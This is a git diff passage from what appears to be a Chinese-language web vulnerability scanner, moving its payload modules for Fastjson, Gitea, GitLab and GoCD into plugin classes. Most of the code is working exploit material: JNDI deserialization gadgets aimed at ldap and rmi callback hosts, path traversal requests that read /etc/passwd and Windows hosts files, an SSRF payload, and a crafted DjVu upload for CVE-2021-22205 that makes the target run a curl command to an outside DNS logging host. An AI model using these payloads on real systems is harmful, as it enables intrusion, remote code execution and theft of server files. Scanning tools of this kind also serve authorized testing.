-    ''' 2月19日，NVD发布的Jackson-databind JNDI注入漏洞（CVE-2020-8840）
-        在jackson-databind中的反序列化gadget也同样影响了fastjson
-        在开启了autoType功能的情况下（autoType功能默认关闭）
-        该漏洞影响最新的fastjson 1.2.62版本
-        攻击者利用该漏洞可实现在目标机器上的远程代码执行
-    '''
-    client = clients.get('reqClient')
-    sessid = '5f3b7891154790b67cfa29ba2041839e'
-    
-    vul_info = {
-        'app_name': 'Fastjson',
-        'vul_type': 'unSerialize',
-        'vul_id': 'fastjson-1.2.62_rce',
-    }
-    
-    headers = {
-        'Content-Type': 'application/json'
-    }
-
-    for payload in rce_1_2_62_payloads:
-        md = random_md5()                                       # * 随机md5值, 8位
-        dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
-        
-        data = payload['data'].replace('DNSDOMAIN', dns_domain)
-
-        res = client.request(
-            'post',
-            '',
-            data=data,
-            headers=headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        sleep(3)
-        if (dns.result(md, sessid)):
-            results = {
-                'Target': res.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Fastjson/rce_1_2_66.py b/payloads/Fastjson/rce_1_2_66.py
deleted file mode 100644
index 2a46948..0000000
--- a/payloads/Fastjson/rce_1_2_66.py
+++ /dev/null
@@ -1,59 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.api.dns import dns
-from lib.tool.md5 import random_md5
-from time import sleep
-
-rce_1_2_66_payloads = [
-    {'data': '{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://DNSDOMAIN/cmai"}'},
-    {'data': '{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://DNSDOMAIN/zosk"}'},
-    {'data': '{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://DNSDOMAIN/pzoq"}'},
-    {'data': '{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://DNSDOMAIN/mzli"}}'},
-    {'data': '{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"rmi://DNSDOMAIN/qpak"}'},
-    {'data': '{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"rmi://DNSDOMAIN/sixu"}'},
-    {'data': '{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"rmi://DNSDOMAIN/ajfi"}'},
-    {'data': '{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"rmi://DNSDOMAIN/zlfi"}}'},
-]
-
-def rce_1_2_66_scan(clients):
-    '''  '''
-    client = clients.get('reqClient')
-    sessid = 'ff79d39d7f4ed0b1569765c84fddb401'
-    
-    vul_info = {
-        'app_name': 'Fastjson',
-        'vul_type': 'unSerialize',
-        'vul_id': 'fastjson-1.2.66_rce',
-    }
-    
-    headers = {
-        'Content-Type': 'application/json'
-    }
-
-    for payload in rce_1_2_66_payloads:
-        md = random_md5()                                       # * 随机md5值, 8位
-        dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
-        
-        data = payload['data'].replace('DNSDOMAIN', dns_domain)
-
-        res = client.request(
-            'post',
-            '',
-            data=data,
-            headers=headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        sleep(3)
-        if (dns.result(md, sessid)):
-            results = {
-                'Target': res.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Gitea/gitea-unauth-fileread-rce.py b/payloads/Gitea/gitea-unauth-fileread-rce.py
new file mode 100644
index 0000000..7f99127
--- /dev/null
+++ b/payloads/Gitea/gitea-unauth-fileread-rce.py
@@ -0,0 +1,85 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Gitea是从gogs衍生出的一个开源项目, 是一个类似于Github、Gitlab的多用户Git仓库管理平台
+    Gitea 1.4.0 未授权访问, 综合漏洞(目录穿越, RCE等)
+        暂无编号
+            Payload: https://vulhub.org/#/environments/gitea/1.4-rce/
+
+其1.4.0版本中有一处逻辑错误, 导致未授权用户可以穿越目录, 读写任意文件, 最终导致执行任意命令
+'''
+
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {
+                'path': '.git/info/lfs/objects',
+                'data': '''{"Oid": "....../../../etc/passwd","Size": 1000000,"User" : "a","Password" : "a","Repo" : "a","Authorization" : "a"}''',
+                'path-2': '.git/info/lfs/objects/%2e%2e%2e%2e%2e%2e%2F%2e%2e%2F%2e%2e%2Fetc%2Fpasswd/a',
+            },
+            {
+                'path': '.git/info/lfs/objects',
+                'data': '''{"Oid": "....../../../C:/Windows/System32/drivers/etc/hosts","Size": 1000000,"User" : "a","Password" : "a","Repo" : "a","Authorization" : "a"}''',
+                'path-2': '.git/info/lfs/objects/%2e%2e%2e%2e%2e%2e%2F%2e%2e%2F%2e%2e%2FC:%2FWindows%2FSystem32%2Fdrivers%2Fetc%2Fhosts/a',
+            },
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'Gitea',
+            'vul_type': 'FileRead/RCE',
+            'vul_id': 'Gitea-unAuthorized',
+        }
+
+        headers = {
+            'Content-Type': 'application/json',
+            'Accept': 'application/vnd.git-lfs+json'
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+            data = payload['data']
+
+            res1 = client.request(
+                'post',
+                path,
+                data=data,
+                headers=headers,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res1 is None:
+                continue
+            
+            path_2 = payload['path-2']
+
+            res2 = client.request(
+                'get',
+                path_2,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res2 is None:
+                continue
+
+            if (check.check_res_fileread(res2.text)):
+                results = {
+                    'Target': res2.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request-1': res1,
+                    'Request-2': res2
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Gitea/main.py b/payloads/Gitea/main.py
deleted file mode 100644
index e0cd763..0000000
--- a/payloads/Gitea/main.py
+++ /dev/null
@@ -1,32 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-Gitea是从gogs衍生出的一个开源项目, 是一个类似于Github、Gitlab的多用户Git仓库管理平台
-    Gitea扫描类: 
-        Gitea 1.4.0 未授权访问, 综合漏洞(目录穿越, RCE等)
-            暂无编号
-                Payload: https://vulhub.org/#/environments/gitea/1.4-rce/
-
-
-file:///etc/passwd
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.Gitea.unauth import unauth_scan
-
-class Gitea():
-    def __init__(self):
-        self.app_name = 'Gitea'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=unauth_scan, clients=clients)
-        ]
-
-gitea = Gitea()
diff --git a/payloads/Gitea/unauth.py b/payloads/Gitea/unauth.py
deleted file mode 100644
index f0264dd..0000000
--- a/payloads/Gitea/unauth.py
+++ /dev/null
@@ -1,68 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool import check
-
-unauth_payloads = [
-    {
-        'path': '.git/info/lfs/objects',
-        'data': '''{"Oid": "....../../../etc/passwd","Size": 1000000,"User" : "a","Password" : "a","Repo" : "a","Authorization" : "a"}''',
-        'path-2': '.git/info/lfs/objects/%2e%2e%2e%2e%2e%2e%2F%2e%2e%2F%2e%2e%2Fetc%2Fpasswd/a',
-    },
-    {
-        'path': '.git/info/lfs/objects',
-        'data': '''{"Oid": "....../../../C:/Windows/System32/drivers/etc/hosts","Size": 1000000,"User" : "a","Password" : "a","Repo" : "a","Authorization" : "a"}''',
-        'path-2': '.git/info/lfs/objects/%2e%2e%2e%2e%2e%2e%2F%2e%2e%2F%2e%2e%2FC:%2FWindows%2FSystem32%2Fdrivers%2Fetc%2Fhosts/a',
-    },
-]
-
-def unauth_scan(clients):
-    ''' 其1.4.0版本中有一处逻辑错误, 导致未授权用户可以穿越目录, 读写任意文件, 最终导致执行任意命令 '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'Gitea',
-        'vul_type': 'unAuthorized',
-        'vul_id': 'Gitea-unAuthorized',
-    }
-
-    headers = {
-        'Content-Type': 'application/json',
-        'Accept': 'application/vnd.git-lfs+json'
-    }
-
-    for payload in unauth_payloads:
-        path = payload['path']
-        data = payload['data']
-
-        res1 = client.request(
-            'post',
-            path,
-            data=data,
-            headers=headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res1 is None:
-            continue
-        
-        path_2 = payload['path-2']
-
-        res2 = client.request(
-            'get',
-            path_2,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res2 is None:
-            continue
-
-        if (check.check_res_fileread(res2.text)):
-            results = {
-                'Target': res2.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request-1': res1,
-                'Request-2': res2
-            }
-            return results
-    return None
diff --git a/payloads/Gitlab/cve_2021_22205.py b/payloads/Gitlab/cve_2021_22205.py
deleted file mode 100644
index 5cbca8b..0000000
--- a/payloads/Gitlab/cve_2021_22205.py
+++ /dev/null
@@ -1,107 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.api.dns import dns
-from lib.tool.md5 import random_md5
-from lib.tool.logger import logger
-from thirdparty import requests
-from time import sleep
-import re
-
-cve_2021_22205_payloads = [
-    {
-        'path-1': 'users/sign_in',
-        'path-2': 'uploads/user',
-    },
-    {
-        'path-1': 'sign_in',
-        'path-2': 'user',
-    },
-]
-
-def cve_2021_22205_scan(self, clients):
-    ''' 在 GitLab CE/EE中发现了一个从11.9版本开始的问题, 
-        GitLab未正确验证传递给文件解析器的图像文件, 从而导致未经身份验证的远程命令执行
-    '''
-    client = clients.get('reqClient')
-    url = client.base_url
-    sessid = '597d45eba94e6e1651ae4fe7bf3b062e'
-
-    vul_info = {
-        'app_name': self.app_name,
-        'vul_type': 'RCE',
-        'vul_id': 'CVE-2021-22205',
-    }
-
-    headers = self.headers
-
-    for payload in cve_2021_22205_payloads:
-        md = random_md5()                                       # * 随机md5值, 8位
-        dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
-        dns_command = 'curl ' + dns_domain
-
-        path_1 = payload['path-1']
-
-        try:
-            # todo 1 / 获取 CSRF-Token
-            res1 = self.session.get(
-                url + path_1, 
-                timeout=self.timeout, 
-                headers=headers,
-                proxies=self.proxies, 
-                verify=False,
-                allow_redirects=False
-            )
-            logger.logging(vul_info, res1.status_code, res1)                        # * LOG
-
-            csrf_token_re = re.search(r'name="csrf-token" content=".*"', res1.text, re.I|re.M|re.U)
-
-            if csrf_token_re:
-                csrf_token = csrf_token_re.group(0)
-                csrf_token = csrf_token.rstrip('"').replace('name="csrf-token" content="', '')
-                headers.update({'X-CSRF-Token': csrf_token})
-                del headers['Content-Type']
-
-                path_2 = payload['path-2']
-
-                data = b'\x41\x54\x26\x54\x46\x4f\x52\x4d' + \
-                (len(dns_command) + 0x55).to_bytes(length=4, byteorder='big', signed=True) + \
-                b'\x44\x4a\x56\x55\x49\x4e\x46\x4f\x00\x00\x00\x0a\x00\x00\x00\x00\x18\x00\x2c\x01\x16\x01\x42\x47\x6a\x70\x00\x00\x00\x00\x41\x4e\x54\x61' + \
-                (len(dns_command) + 0x2f).to_bytes(length=4, byteorder='big', signed=True) + \
-                b'\x28\x6d\x65\x74\x61\x64\x61\x74\x61\x0a\x09\x28\x43\x6f\x70\x79\x72\x69\x67\x68\x74\x20\x22\x5c\x0a\x22\x20\x2e\x20\x71\x78\x7b' + \
-                dns_command.encode() + \
-                b'\x7d\x20\x2e\x20\x5c\x0a\x22\x20\x62\x20\x22\x29\x20\x29\x0a'
-
-                files = [('file', ('test.jpg', data, 'image/jpeg'))]
-
-                res2 = self.session.post(
-                    url + path_2, 
-                    timeout=self.timeout, 
-                    headers=headers,
-                    files=files, 
-                    proxies=self.proxies, 
-                    verify=False,
-                    allow_redirects=False
-                )
-                logger.logging(vul_info, res2.status_code, res2)                        # * LOG
-                
-                sleep(3)
-                if (dns.result(md, sessid)):
-                    results = {
-                        'Target': res2.request.url,
-                        'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                        'Exp': 'https://raw.githubusercontent.com/vulhub/vulhub/master/gitlab/CVE-2021-22205/poc.py',
-                        'Request-1(csrf-token)': res1,
-                        'Request-2': res2
-                    }
-                    return results
-
-        except requests.ConnectTimeout:
-            logger.logging(vul_info, 'Timeout')
-            return None
-        except requests.ConnectionError:
-            logger.logging(vul_info, 'Faild')
-            return None
-        except:
-            logger.logging(vul_info, 'Error')
-            return None
diff --git a/payloads/Gitlab/cve_2021_22214.py b/payloads/Gitlab/cve_2021_22214.py
deleted file mode 100644
index b2353be..0000000
--- a/payloads/Gitlab/cve_2021_22214.py
+++ /dev/null
@@ -1,67 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.api.dns import dns
-from lib.tool.md5 import random_md5
-from time import sleep
-
-cve_2021_22214_payloads = [
-    {
-        'path': 'api/v4/ci/lint',
-        'data': '{ "include_merged_yaml": true, "content": "include:\\n  remote: http://DNSDOMAIN/api/v1/targets/?test.yml"}'
-    },
-    {
-        'path': 'v4/ci/lint',
-        'data': '{ "include_merged_yaml": true, "content": "include:\\n  remote: http://DNSDOMAIN/api/v1/targets/?test.yml"}'
-    },
-    {
-        'path': 'ci/lint',
-        'data': '{ "include_merged_yaml": true, "content": "include:\\n  remote: http://DNSDOMAIN/api/v1/targets/?test.yml"}'
-    },
-]
-
-def cve_2021_22214_scan(self, clients):
-    ''' Gitlab的CI lint API用于验证提供给gitlab ci的配置文件是否是yaml格式, 
-        其include操作支持remote选项, 用于获取远端的yaml, 因此在此处将remote参数设置为本地回环地址, 
-        同时由于后端会检查最后扩展名, 加上?test.yaml 即可绕过
-    '''
-    client = clients.get('reqClient')
-    sessid = '35c4b2b338754840369c3b20a2847f0a'
-
-    vul_info = {
-        'app_name': self.app_name,
-        'vul_type': 'SSRF',
-        'vul_id': 'CVE-2021-22214',
-    }
-
-    headers = {
-        'Content-Type': 'application/json'
-    }
-
-    for payload in cve_2021_22214_payloads:
-        md = random_md5()                                       # * 随机md5值, 8位
-        dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
-
-        path = payload['path']
-        data = payload['data'].replace('DNSDOMAIN', dns_domain)
-
-        res = client.request(
-            'post',
-            path,
-            data=data,
-            headers=headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        sleep(3)
-        if (dns.result(md, sessid)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Gitlab/gitlab-cve-2021-22205-rce.py b/payloads/Gitlab/gitlab-cve-2021-22205-rce.py
new file mode 100644
index 0000000..b1a93a2
--- /dev/null
+++ b/payloads/Gitlab/gitlab-cve-2021-22205-rce.py
@@ -0,0 +1,128 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+GitLab Pre-Auth 远程命令执行 
+    CVE-2021-22205
+        Payload: https://vulhub.org/#/environments/gitlab/CVE-2021-22205/
+        反弹shell: https://blog.csdn.net/weixin_46137328/article/details/121551162
+
+在 GitLab CE/EE中发现了一个从11.9版本开始的问题, 
+    GitLab未正确验证传递给文件解析器的图像文件, 从而导致未经身份验证的远程命令执行
+'''
+
+from thirdparty import requests
+from lib.api.dns import dns
+from lib.tool.logger import logger
+from lib.tool.md5 import random_md5
+from lib.initial.config import config
+import re
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {
+                'path-1': 'users/sign_in',
+                'path-2': 'uploads/user',
+            },
+            {
+                'path-1': 'sign_in',
+                'path-2': 'user',
+            },
+        ]
+        
+        self.session = requests.session()
+
+        self.headers = config.get('headers')
+        self.timeout = config.get('timeout')
+        self.proxies = config.get('proxies')
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        url = client.base_url
+        sessid = '597d45eba94e6e1651ae4fe7bf3b062e'
+
+        vul_info = {
+            'app_name': 'Gitlab',
+            'vul_type': 'RCE',
+            'vul_id': 'CVE-2021-22205',
+        }
+
+        headers = self.headers
+
+        for payload in self.payloads:
+            md = random_md5()                                       # * 随机md5值, 8位
+            dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
+            dns_command = 'curl ' + dns_domain
+
+            path_1 = payload['path-1']
+
+            try:
+                # todo 1 / 获取 CSRF-Token
+                res1 = self.session.get(
+                    url + path_1, 
+                    timeout=self.timeout, 
+                    headers=headers,
+                    proxies=self.proxies, 
+                    verify=False,
+                    allow_redirects=False
+                )
+                logger.logging(vul_info, res1.status_code, res1)                        # * LOG
+
+                csrf_token_re = re.search(r'name="csrf-token" content=".*"', res1.text, re.I|re.M|re.U)
+
+                if csrf_token_re:
+                    csrf_token = csrf_token_re.group(0)
+                    csrf_token = csrf_token.rstrip('"').replace('name="csrf-token" content="', '')
+                    headers.update({'X-CSRF-Token': csrf_token})
+                    del headers['Content-Type']
+
+                    path_2 = payload['path-2']
+
+                    data = b'\x41\x54\x26\x54\x46\x4f\x52\x4d' + \
+                    (len(dns_command) + 0x55).to_bytes(length=4, byteorder='big', signed=True) + \
+                    b'\x44\x4a\x56\x55\x49\x4e\x46\x4f\x00\x00\x00\x0a\x00\x00\x00\x00\x18\x00\x2c\x01\x16\x01\x42\x47\x6a\x70\x00\x00\x00\x00\x41\x4e\x54\x61' + \
+                    (len(dns_command) + 0x2f).to_bytes(length=4, byteorder='big', signed=True) + \
+                    b'\x28\x6d\x65\x74\x61\x64\x61\x74\x61\x0a\x09\x28\x43\x6f\x70\x79\x72\x69\x67\x68\x74\x20\x22\x5c\x0a\x22\x20\x2e\x20\x71\x78\x7b' + \
+                    dns_command.encode() + \
+                    b'\x7d\x20\x2e\x20\x5c\x0a\x22\x20\x62\x20\x22\x29\x20\x29\x0a'
+
+                    files = [('file', ('test.jpg', data, 'image/jpeg'))]
+
+                    res2 = self.session.post(
+                        url + path_2, 
+                        timeout=self.timeout, 
+                        headers=headers,
+                        files=files, 
+                        proxies=self.proxies, 
+                        verify=False,
+                        allow_redirects=False
+                    )
+                    logger.logging(vul_info, res2.status_code, res2)                        # * LOG
+                    
+                    if (dns.result(md, sessid)):
+                        results = {
+                            'Target': res2.request.url,
+                            'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                            'Exp': 'https://raw.githubusercontent.com/vulhub/vulhub/master/gitlab/CVE-2021-22205/poc.py',
+                            'Request-1(csrf-token)': res1,
+                            'Request-2': res2
+                        }
+                        return results
+
+            except requests.ConnectTimeout:
+                logger.logging(vul_info, 'Timeout')
+                return None
+            except requests.ConnectionError:
+                logger.logging(vul_info, 'Faild')
+                return None
+            except:
+                logger.logging(vul_info, 'Error')
+                return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Gitlab/gitlab-cve-2021-22214-ssrf.py b/payloads/Gitlab/gitlab-cve-2021-22214-ssrf.py
new file mode 100644
index 0000000..d4cab99
--- /dev/null
+++ b/payloads/Gitlab/gitlab-cve-2021-22214-ssrf.py
@@ -0,0 +1,80 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Gitlab CI Lint API未授权 SSRF
+    CVE-2021-22214
+        Payload: https://cloud.tencent.com/developer/article/1851527
+
+Gitlab的CI lint API用于验证提供给gitlab ci的配置文件是否是yaml格式, 
+    其include操作支持remote选项, 用于获取远端的yaml, 因此在此处将remote参数设置为本地回环地址, 
+    同时由于后端会检查最后扩展名, 加上?test.yaml 即可绕过
+'''
+
+from lib.api.dns import dns
+from lib.tool.md5 import random_md5
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {
+                'path': 'api/v4/ci/lint',
+                'data': '{ "include_merged_yaml": true, "content": "include:\\n  remote: http://DNSDOMAIN/api/v1/targets/?test.yml"}'
+            },
+            {
+                'path': 'v4/ci/lint',
+                'data': '{ "include_merged_yaml": true, "content": "include:\\n  remote: http://DNSDOMAIN/api/v1/targets/?test.yml"}'
+            },
+            {
+                'path': 'ci/lint',
+                'data': '{ "include_merged_yaml": true, "content": "include:\\n  remote: http://DNSDOMAIN/api/v1/targets/?test.yml"}'
+            },
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        sessid = '35c4b2b338754840369c3b20a2847f0a'
+
+        vul_info = {
+            'app_name': 'Gitlab',
+            'vul_type': 'SSRF',
+            'vul_id': 'CVE-2021-22214',
+        }
+
+        headers = {
+            'Content-Type': 'application/json'
+        }
+
+        for payload in self.payloads:
+            md = random_md5()                                       # * 随机md5值, 8位
+            dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
+
+            path = payload['path']
+            data = payload['data'].replace('DNSDOMAIN', dns_domain)
+
+            res = client.request(
+                'post',
+                path,
+                data=data,
+                headers=headers,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (dns.result(md, sessid)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Gitlab/main.py b/payloads/Gitlab/main.py
deleted file mode 100644
index c6fa856..0000000
--- a/payloads/Gitlab/main.py
+++ /dev/null
@@ -1,49 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-
-    Gitlab扫描类: 
-        1. GitLab Pre-Auth 远程命令执行 
-            CVE-2021-22205
-                Payload: https://vulhub.org/#/environments/gitlab/CVE-2021-22205/
-                反弹shell: https://blog.csdn.net/weixin_46137328/article/details/121551162
-
-        2. Gitlab CI Lint API未授权 SSRF
-            CVE-2021-22214
-                Payload: https://cloud.tencent.com/developer/article/1851527
-
-
-file:///etc/passwd
-file:///C:\Windows\System32\drivers\etc\hosts
-file:///C:/Windows/System32/drivers/etc/hosts
-'''
-
-from lib.initial.config import config
-from lib.tool.thread import thread
-from thirdparty import requests
-from payloads.Gitlab.cve_2021_22205 import cve_2021_22205_scan
-from payloads.Gitlab.cve_2021_22214 import cve_2021_22214_scan
-
-class Gitlab():
-    def __init__(self):
-        self.app_name = 'Gitlab'
-        self.session = requests.session()
-
-        self.headers = config.get('headers')
-        self.timeout = config.get('timeout')
-        self.proxies = config.get('proxies')
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target=self.{}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=self.cve_2021_22205_scan, clients=clients),
-            thread(target=self.cve_2021_22214_scan, clients=clients)
-        ]
-
-Gitlab.cve_2021_22205_scan = cve_2021_22205_scan
-Gitlab.cve_2021_22214_scan = cve_2021_22214_scan
-
-gitlab = Gitlab()
diff --git a/payloads/GoCD/cve_2021_43287.py b/payloads/GoCD/cve_2021_43287.py
deleted file mode 100644
index 9e644a2..0000000
--- a/payloads/GoCD/cve_2021_43287.py
+++ /dev/null
@@ -1,47 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool import check
-
-cve_2021_43287_payloads = [
-    {'path': 'go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../../../../etc/passwd'},
-    {'path': 'add-on/business-continuity/api/plugin?folderName=&pluginName=../../../../../../etc/passwd'},
-    {'path': 'business-continuity/api/plugin?folderName=&pluginName=../../../../../../etc/passwd'},
-    {'path': 'go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../../../../C:/Windows/System32/drivers/etc/hosts'},
-    {'path': 'add-on/business-continuity/api/plugin?folderName=&pluginName=../../../../../../C:/Windows/System32/drivers/etc/hosts'},
-    {'path': 'business-continuity/api/plugin?folderName=&pluginName=../../../../../../C:/Windows/System32/drivers/etc/hosts'},
-    # {'path': 'go/add-on/business-continuity/api/plugin?folderName=&pluginName=..\\..\\..\\..\\..\\..\\C:\\Windows\\System32\\drivers\\etc\\hosts'},
-]
-
-def cve_2021_43287_scan(clients):
-    ''' GoCD plugin API 参数中的pluginName参数存在任意文件读取漏洞
-            导致攻击者可以获取服务器中的任意敏感信息
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'GoCD',
-        'vul_type': 'FileRead',
-        'vul_id': 'CVE-2021-43287',
-    }
-    
-    for payload in cve_2021_43287_payloads:
-        path = payload['path']
-
-        res = client.request(
-            'get',
-            path,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (check.check_res_fileread(res.text)):
-            results = {
-                'Target': res.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/GoCD/gocd-cve-2021-43287-fileread.py b/payloads/GoCD/gocd-cve-2021-43287-fileread.py
new file mode 100644
index 0000000..12fe091
--- /dev/null
+++ b/payloads/GoCD/gocd-cve-2021-43287-fileread.py
@@ -0,0 +1,64 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+GoCD是一个开源的持续集成和持续交付系统，可以在持续交付过程中执行编译，自动化测试，自动部署等等
+    GoCD Business Continuity 任意文件读取漏洞
+        CVE-2021-43287
+            Payload: http://wiki.peiqi.tech/wiki/webserver/GoCD/GoCD%20plugin%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CVE-2021-43287.html
+                     https://avd.aliyun.com/detail?id=AVD-2021-43287
+
+GoCD plugin API 参数中的pluginName参数存在任意文件读取漏洞
+    导致攻击者可以获取服务器中的任意敏感信息
+'''
+
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': 'go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../../../../etc/passwd'},
+            {'path': 'add-on/business-continuity/api/plugin?folderName=&pluginName=../../../../../../etc/passwd'},
+            {'path': 'business-continuity/api/plugin?folderName=&pluginName=../../../../../../etc/passwd'},
+            {'path': 'go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../../../../C:/Windows/System32/drivers/etc/hosts'},
+            {'path': 'add-on/business-continuity/api/plugin?folderName=&pluginName=../../../../../../C:/Windows/System32/drivers/etc/hosts'},
+            {'path': 'business-continuity/api/plugin?folderName=&pluginName=../../../../../../C:/Windows/System32/drivers/etc/hosts'},
+            # {'path': 'go/add-on/business-continuity/api/plugin?folderName=&pluginName=..\\..\\..\\..\\..\\..\\C:\\Windows\\System32\\drivers\\etc\\hosts'},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'GoCD',
+            'vul_type': 'FileRead',
+            'vul_id': 'CVE-2021-43287',
+        }
+        
+        for payload in self.payloads:
+            path = payload['path']
+
+            res = client.request(
+                'get',
+                path,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (check.check_res_fileread(res.text)):
+                results = {
+                    'Target': res.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/GoCD/main.py b/payloads/GoCD/main.py
deleted file mode 100644
index 28f07e2..0000000
--- a/payloads/GoCD/main.py
+++ /dev/null
@@ -1,33 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-GoCD是一个开源的持续集成和持续交付系统，可以在持续交付过程中执行编译，自动化测试，自动部署等等
-    GoCD扫描类: 
-        1. GoCD Business Continuity 任意文件读取漏洞
-            CVE-2021-43287
-                Payload: http://wiki.peiqi.tech/wiki/webserver/GoCD/GoCD%20plugin%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CVE-2021-43287.html
-                         https://avd.aliyun.com/detail?id=AVD-2021-43287
-
-file:///etc/passwd
-file:///C:/Windows/System32/drivers/etc/hosts
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.GoCD.cve_2021_43287 import cve_2021_43287_scan
-
-class GoCD():
-    def __init__(self):
-        self.app_name = 'GoCD'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2021_43287_scan, clients=clients)
-        ]
-
-gocd = GoCD()
